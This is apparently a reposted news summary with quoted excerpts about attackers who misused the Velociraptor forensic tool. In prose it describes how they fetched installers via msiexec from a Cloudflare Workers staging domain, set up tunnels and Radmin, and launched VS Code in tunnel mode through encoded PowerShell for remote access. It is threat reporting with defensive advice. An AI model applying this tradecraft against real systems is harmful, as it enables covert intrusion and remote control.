"Further analysis of the incident has revealed that the attackers used the Windows msiexec utility to download an MSI installer from a Cloudflare Workers domain, which serves as a staging ground for other tools used by them, including a Cloudflare tunneling tool and a remote administration utility known as Radmin."
"The access is then leveraged to download Visual Studio Code from the same staging server using an encoded PowerShell command and execute the source code editor with the tunnel option enabled in order to allow both remote access and remote code execution. The threat actors have also been observed utilizing the msiexec Windows utility again to download additional payloads from the workers[.]dev folder."
Unknown threat actors deployed the open-source endpoint monitoring and forensic tool Velociraptor to gain access and minimize custom malware use. The attackers used Windows msiexec to fetch an MSI installer hosted on Cloudflare Workers, which served as a staging ground for a Cloudflare tunneling tool and the Radmin remote administration utility. Velociraptor was installed and contacted a separate Cloudflare Workers domain. The adversaries used an encoded PowerShell command to download Visual Studio Code and executed it with the tunnel option enabled to provide remote access and remote code execution. Additional payloads were retrieved from the workers[.]dev folder. Organizations should monitor for unauthorized Velociraptor use and implement endpoint detection and response as a precaution against ransomware.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]